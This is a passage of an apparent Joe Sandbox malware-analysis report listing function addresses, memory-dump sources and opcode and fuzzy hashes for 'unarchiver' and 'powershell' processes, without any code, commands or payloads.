                                                                                      • Opcode ID: 4e6464f8092b7c67c9290faee87c4de050c8f6679283d4b41c22cc5dd8fb915c
                                                                                      • Instruction ID: ddc75fecbfdec84089ab1c8fc41cbdc943b54bfe1f07030b62ffe656f759d2df
                                                                                      • Opcode Fuzzy Hash: 4e6464f8092b7c67c9290faee87c4de050c8f6679283d4b41c22cc5dd8fb915c
                                                                                      • Instruction Fuzzy Hash: 21E0DF61F142941FEB04EAB85450AEE7FA5DF92064FD544BAC008D7781EA35CC0783D0
                                                                                      Function 00E00C60 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ce10796c4f4289929df274e7197ab7e69edb1ef4c7587b54c93957c321c666ce
                                                                                      • Instruction ID: ad7e3cd7b1db4451bd0aec6e083c46ed13b194bf24dcbb46554f797417fdf34b
                                                                                      • Opcode Fuzzy Hash: ce10796c4f4289929df274e7197ab7e69edb1ef4c7587b54c93957c321c666ce
                                                                                      • Instruction Fuzzy Hash: AFD017B1F142282B9B48EAB99850DEEBBEADF84164B95847D9009E7740EE35DC0687C0
                                                                                      Function 00E00DD1 Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e7db6fe857e4cfc0738804d67d5fe04e2a852c6198348650c86875667190f3dc
                                                                                      • Instruction ID: 9da13b5c1da1f5df8a229dc108e0f9df7a7db19b76c21f6878aaef20e9cf6c81
                                                                                      • Opcode Fuzzy Hash: e7db6fe857e4cfc0738804d67d5fe04e2a852c6198348650c86875667190f3dc
                                                                                      • Instruction Fuzzy Hash: E1E086242493C04FDB0393349459EE53F715F83204F8E90E9C044DBAE3C5648C96D791
                                                                                      Function 00CF23F4 Relevance: .0, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282593956.0000000000CF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF2000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cf2000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dec4a988f157a0fcb9eb40e1a23c8365e0983f2c52f431ef1dd6e47a00a4c02d
                                                                                      • Instruction ID: b80498eaf717976a2bf26327bb880411017739b26c87b0302f94d678cfcd43bc
                                                                                      • Opcode Fuzzy Hash: dec4a988f157a0fcb9eb40e1a23c8365e0983f2c52f431ef1dd6e47a00a4c02d
                                                                                      • Instruction Fuzzy Hash: FAD05E792056C14FE3279B1CC1A4BA53BE4AB51714F4B44FEA8008F763C7A8DA81E611
                                                                                      Function 00CF23BC Relevance: .0, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282593956.0000000000CF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF2000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cf2000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cbc49cac1e5308fab01a9b6d0dd5a20a9f4990a322452be7a0d4506ba4b3d520
                                                                                      • Instruction ID: bd1a1a201bf18bcf013c42fe5e5232d17ae1dde6240593283e50beabc20446b9
                                                                                      • Opcode Fuzzy Hash: cbc49cac1e5308fab01a9b6d0dd5a20a9f4990a322452be7a0d4506ba4b3d520
                                                                                      • Instruction Fuzzy Hash: 73D05E742006854BC725DA0CC2D4FA937E8AB40714F1644ECAC208B772C7A8D9C8CA01
                                                                                      Function 00E00DE0 Relevance: .0, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a5da44ef18324024a75c0b2f78129e458252f96adbd548be9a56c3768fdd9907
                                                                                      • Instruction ID: b877a8515507dfb922c192920dc74957fcd05fd9a88dcc215d455e45ed0040ca
                                                                                      • Opcode Fuzzy Hash: a5da44ef18324024a75c0b2f78129e458252f96adbd548be9a56c3768fdd9907
                                                                                      • Instruction Fuzzy Hash: 44C012302003048BD704A768D45DF2573D667C0308F85C46494085B395CA70ECC1D6C0

                                                                                      Executed Functions

                                                                                      Function 00007FFAACBF6605 Relevance: .4, Instructions: 449COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1363454977.00007FFAACBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ffaacbf0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c359d327d4b0c066957cec72716b35803340378f1bd195f5c24d0a0aa728d87f
                                                                                      • Instruction ID: 42dae4f8362bdbc5bc72feb779fa4dca9e0d85f8d4800f0699bfa37d55359c26
                                                                                      • Opcode Fuzzy Hash: c359d327d4b0c066957cec72716b35803340378f1bd195f5c24d0a0aa728d87f
                                                                                      • Instruction Fuzzy Hash: 9DD168A690EBDA9FF755976888165B97FA0EF16310B0801FFD84DC7293DA19D809C3C1
                                                                                      Function 00007FFAACB29FF2 Relevance: .4, Instructions: 354COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1362773519.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ffaacb20000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a7dbfff6edc91407509b0a8de50b1b7cc7d8f1226a20f9de30cec9a7195d8fcc
                                                                                      • Instruction ID: 67d341b6e6eec863019903ab69f4631580eed5fb5a784f1fce0cec9144e79cef
                                                                                      • Opcode Fuzzy Hash: a7dbfff6edc91407509b0a8de50b1b7cc7d8f1226a20f9de30cec9a7195d8fcc
                                                                                      • Instruction Fuzzy Hash: A451B4A290E7D58FE312A76CE8B60E57FA0DF5322570941F7C0C8CA0B3F919584A83D6
                                                                                      Function 00007FFAACB295FA Relevance: .3, Instructions: 303COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1362773519.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ffaacb20000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4469bf43f6a81d24f8d0d0430510da3d1584b68150f6580d1c2b169fb88b44f9
                                                                                      • Instruction ID: 73afee25b74585bf60cea7293515abf0031c3f8e074f138d0c142b76aad19abf
                                                                                      • Opcode Fuzzy Hash: 4469bf43f6a81d24f8d0d0430510da3d1584b68150f6580d1c2b169fb88b44f9
                                                                                      • Instruction Fuzzy Hash: 4991F6B2D0E7D54FE7169B6CAC5A5E57FE0EF53210F0840BBD08C87193EA15A84987D2
                                                                                      Function 00007FFAACA0E620 Relevance: .1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1362220685.00007FFAACA0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA0D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ffaaca0d000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3e19395369ba09744f2f9d979df6b59905fc78956bca20fba75463b960fbffa6
                                                                                      • Instruction ID: 327eb4fbfeac27348c47276cebf9e8931c825d15cbcc72ce8f8ac48e6962b2fc
                                                                                      • Opcode Fuzzy Hash: 3e19395369ba09744f2f9d979df6b59905fc78956bca20fba75463b960fbffa6
                                                                                      • Instruction Fuzzy Hash: 1C41257141DBC49FE3568B28A8459623FF0EF57220B1505DFD088CB1A3D625E84AC7A2
                                                                                      Function 00007FFAACB2A62C Relevance: .1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1362773519.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ffaacb20000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 13686fc2f4e8987b66590fa63ae442370640c088600a43ca3ee0565f5e2a3e47
                                                                                      • Instruction ID: 669d32dd5b39aefa1b466c2e0d117557bdb1117777b05562c1558b89b0e3bee2
                                                                                      • Opcode Fuzzy Hash: 13686fc2f4e8987b66590fa63ae442370640c088600a43ca3ee0565f5e2a3e47
                                                                                      • Instruction Fuzzy Hash: F821063190DB4C8FEB59DBACD84A6E97FF0EB56321F04416BD048C3152DA74A40ACB92
                                                                                      Function 00007FFAACB233B5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1362773519.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ffaacb20000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction ID: 11d66e6850bd6f8ec4bcad91ddbe9ab688b9d117742591c10d6e6c16f703269a
                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction Fuzzy Hash: 9401677111CB0C8FD744EF0CE451AA6B7E0FB99364F10056DE58AC36A1DB36E882CB45
                                                                                      Function 00007FFAACBF414D Relevance: .0, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1363454977.00007FFAACBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ffaacbf0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 054665b3d0be1065e23e9442448238d6664868d3c5f91e7a9fa3d632df1ce98a
                                                                                      • Instruction ID: de9067d7ceac67d08b7fa7929139da569917257688488488060be0fd0b0ce8b8
                                                                                      • Opcode Fuzzy Hash: 054665b3d0be1065e23e9442448238d6664868d3c5f91e7a9fa3d632df1ce98a
                                                                                      • Instruction Fuzzy Hash: CCF0BE32A4DA088FE758EB5CE4458E877E0EF5532071140BAE05DC72A3CE26EC44CBC0
                                                                                      Function 00007FFAACBF4400 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1363454977.00007FFAACBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ffaacbf0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 52b957dfd7df84182687546d3cc877ed087b193a781658cab04687acebad18e4
                                                                                      • Instruction ID: 272d7a806cc4b41530c3233a1e583ad749af25fa93c0eaa03bfcbcceb29ac755
                                                                                      • Opcode Fuzzy Hash: 52b957dfd7df84182687546d3cc877ed087b193a781658cab04687acebad18e4
                                                                                      • Instruction Fuzzy Hash: A1F0BE72A0D6488FE758EB1CE0458E877E0FF4532071140B6E08DCB163CE26EC54CB80
                                                                                      Function 00007FFAACBF41D1 Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1363454977.00007FFAACBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ffaacbf0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                      • Instruction ID: 836bf2ca9d2c3fa288e5e6ef475f94353105da3158306a7304306ae5ff3acfdf
                                                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                      • Instruction Fuzzy Hash: 51E01A31B4C918CFEA68DB0CE0409E977E1EB9932171181B7D14EC7661CA32ED559BC0

                                                                                      Non-executed Functions

                                                                                      Function 00007FFAACB28995 Relevance: 5.1, Strings: 4, Instructions: 136COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1362773519.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_7ffaacb20000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: N_^$N_^$N_^$N_^
                                                                                      • API String ID: 0-1196809394
                                                                                      • Opcode ID: faae7efd6d05cef8da04006b5daf4532bb224121a2e756a5ef3cf8a49f51e7e2
                                                                                      • Instruction ID: ed449bba86437dada780bf36298f21f7350fad8ea3608eb553b2f9671bff4fd6
                                                                                      • Opcode Fuzzy Hash: faae7efd6d05cef8da04006b5daf4532bb224121a2e756a5ef3cf8a49f51e7e2
                                                                                      • Instruction Fuzzy Hash: C54171A390FBD38BF35A43589C761916FE0EF63255B4D41F6C1888B493FD1B580A8392

                                                                                      Executed Functions

                                                                                      Function 00007FFAACB4644D Relevance: .7, Instructions: 691COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1467265496.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffaacb40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7693607e6b04285db3614f387b7153ba9df54ffb1c0d4d5e091a44ee5b866d42
                                                                                      • Instruction ID: 1f08d2b251709f2e4d2670b0d9e6c002d63cbd1def694b64bd81a422437186f0
                                                                                      • Opcode Fuzzy Hash: 7693607e6b04285db3614f387b7153ba9df54ffb1c0d4d5e091a44ee5b866d42
                                                                                      • Instruction Fuzzy Hash: 0ED17A30A18A5DCFEB88DF58C445AA9BBE1FF69300F14816AD40DD7296CA35EC85CBC1
                                                                                      Function 00007FFAACC130E9 Relevance: .7, Instructions: 662COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1468390937.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffaacc10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3770b35072bad90b26ffe35bd7edd9ec4a190e88bd57373aab484da70e0abddd
                                                                                      • Instruction ID: 194e843252aa9e420b892317e60d427930917ba0e9fe16147da95182740b4b56
                                                                                      • Opcode Fuzzy Hash: 3770b35072bad90b26ffe35bd7edd9ec4a190e88bd57373aab484da70e0abddd
                                                                                      • Instruction Fuzzy Hash: 701212A2A0EB854FF3969B2D58591707FE1EF97224B0D41FBD48DC71A3D918EC0A8391
                                                                                      Function 00007FFAACC16605 Relevance: .4, Instructions: 444COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1468390937.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffaacc10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2364aff64a1dab78fc4b093a39eba0669c8a404e90f116d3e879407b738784f9
                                                                                      • Instruction ID: 793a5bd7c5c1baa483e76d1813b385e0803eb4da8a0f14d5f16ea2270d33e0f5
                                                                                      • Opcode Fuzzy Hash: 2364aff64a1dab78fc4b093a39eba0669c8a404e90f116d3e879407b738784f9
                                                                                      • Instruction Fuzzy Hash: 3ED157B690EB8A8FF7569F6988155B57BA0EF16310B0441FEE54DCB093DA18DC09C3D1
                                                                                      Function 00007FFAACB4A0F3 Relevance: .3, Instructions: 251COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1467265496.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffaacb40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0bb298ee7b6f37dce04629133a76a4c36be56f7c3fde1cc15b42a383862bc705
                                                                                      • Instruction ID: 3d53f6d3b9da1e2182420a00ae16ea2568cc7a7c821fcff4486162688e5cc02c
                                                                                      • Opcode Fuzzy Hash: 0bb298ee7b6f37dce04629133a76a4c36be56f7c3fde1cc15b42a383862bc705
                                                                                      • Instruction Fuzzy Hash: 13114C6690E7D98FD757AB7898690E47FB0EF63215B0900E7D488CB0B3DA199C4CC792
                                                                                      Function 00007FFAACB496E2 Relevance: .2, Instructions: 200COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1467265496.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffaacb40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7725e39a61951c6ed089d2fd37790fc11095072638480a3f4750dac31cb67303
                                                                                      • Instruction ID: 538b6f2c3174b139e695f5e0799cd6afb65f69c353f782096f1225381340b0f9
                                                                                      • Opcode Fuzzy Hash: 7725e39a61951c6ed089d2fd37790fc11095072638480a3f4750dac31cb67303
                                                                                      • Instruction Fuzzy Hash: 9051F472D0DA958FF7199B5CEC5A5A97BE0EF66310F04817BD48C83192DA25A809C7C2
                                                                                      Function 00007FFAACC13361 Relevance: .2, Instructions: 183COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1468390937.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffaacc10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a99de849c86155899acf9ebdb85c71055c473af24cc82d5fc08e19d0301de043
                                                                                      • Instruction ID: a9f3b016a653590f92646f2ba36e54d65e0d0af8e3b6d0eb2bdfc4dd50e065ea
                                                                                      • Opcode Fuzzy Hash: a99de849c86155899acf9ebdb85c71055c473af24cc82d5fc08e19d0301de043
                                                                                      • Instruction Fuzzy Hash: 56513862A0DB8A8FF3A6DF1E58541707ED1EF96314B4C41BAC04DC7592DD19EC4A83C5
                                                                                      Function 00007FFAACA2EB80 Relevance: .1, Instructions: 125COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1466369495.00007FFAACA2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA2D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffaaca2d000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ae62e817c0cf373ad8b06f633b94e314ecc6573a4b1626eb5bbc430c12f1e1fc
                                                                                      • Instruction ID: ef858f20b6932d5d395a09422aaed39c08834ac49dad154fe2f387ec7eeda737
                                                                                      • Opcode Fuzzy Hash: ae62e817c0cf373ad8b06f633b94e314ecc6573a4b1626eb5bbc430c12f1e1fc
                                                                                      • Instruction Fuzzy Hash: 9141263040EBC48FE7568B28A8559623FB4EF53221B1545DFD089CB1A3E629E84AC792
                                                                                      Function 00007FFAACB4A64C Relevance: .1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1467265496.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffaacb40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 395aa93d98def67bd62e00d865ab1ec9d5c754eccd100367d9068d0eb0efbbf4
                                                                                      • Instruction ID: ae57736308c999b649d632e80b7132002a33e308574ff9aebbd47d71a1743019
                                                                                      • Opcode Fuzzy Hash: 395aa93d98def67bd62e00d865ab1ec9d5c754eccd100367d9068d0eb0efbbf4
                                                                                      • Instruction Fuzzy Hash: EA21093090CB4C8FEB59DBACD84A6E97FE0EF56320F04416BD048C3152DA759859CB91
                                                                                      Function 00007FFAACB433B5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1467265496.00007FFAACB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffaacb40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                      • Instruction ID: d06cb320361b13ded840ff1a2540a5049fe41d2776c2545dc42fd516e1cbe298
                                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                      • Instruction Fuzzy Hash: C401677111CB0C8FD744EF0CE451AA6B7E0FB99364F10056DE58AC3691DB36E882CB45
                                                                                      Function 00007FFAACC1414D Relevance: .0, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1468390937.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffaacc10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c141e2a9c1610afd790cbcf259c75bb91e02f4097a1c91f15e0e63f5de0c5385
                                                                                      • Instruction ID: a2984a03be2e15c3761a7197a67ac6034c422b5759f6cfb5837f7746efd4a82f
                                                                                      • Opcode Fuzzy Hash: c141e2a9c1610afd790cbcf259c75bb91e02f4097a1c91f15e0e63f5de0c5385
                                                                                      • Instruction Fuzzy Hash: 22F0BE32A0D9098FE768EB5CE4458E873E0EF5633072100BAE05DC71A3CE25EC54C780
                                                                                      Function 00007FFAACC14400 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1468390937.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffaacc10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7048f56df81150d6148e7f06ac5578ea6d80fb06630de136df3cbe5ce78d60c3
                                                                                      • Instruction ID: 7bd15f55b6858989f5c35d16ea1d1a251b53d4b241fe3dbfe79a0f3b843c9b8d
                                                                                      • Opcode Fuzzy Hash: 7048f56df81150d6148e7f06ac5578ea6d80fb06630de136df3cbe5ce78d60c3
                                                                                      • Instruction Fuzzy Hash: F0F0B872A0D5488FE758EB1DE0468A877E0FF46320B4140B6E04DCB8A3CA26EC48C780
                                                                                      Function 00007FFAACC141D1 Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1468390937.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffaacc10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                      • Instruction ID: 472ba929b442bde518d534a84eec7a969ce8059656e9c23f299468c3474c89c4
                                                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                      • Instruction Fuzzy Hash: A7E01A31B0C809CFEA68DF0DE0409E973E1EB9933172141B7D14EC7561CA22EC569BC0
                                                                                      Function 00007FFAACA2EC99 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.1466369495.00007FFAACA2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA2D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffaaca2d000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d5048639ba4b3381bb1f5458927114b35d29df434777fa2d037e081ece03077
                                                                                      • Instruction ID: 1fd9fe4b9cdee9a13fd4f96c10f49e80b7d3708217b1f8ddb9a7e3249e7919d7
                                                                                      • Opcode Fuzzy Hash: 6d5048639ba4b3381bb1f5458927114b35d29df434777fa2d037e081ece03077
                                                                                      • Instruction Fuzzy Hash: 6FE01A30629D09CFDA94EB69C085D2537E2FB59300B204468E05ECB261E634F882CBC1

                                                                                      Executed Functions

                                                                                      Function 00007FFAACC0664C Relevance: .4, Instructions: 410COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1643159267.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacc00000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6c86f600f741c21971d5ce77b03abcaec1416eae83c0757e2340acbd7b8a7fc3
                                                                                      • Instruction ID: e7471efb9f7ac3e7af01fe76352392d2b7cdefeaa9e83332e8ff544257fd8494
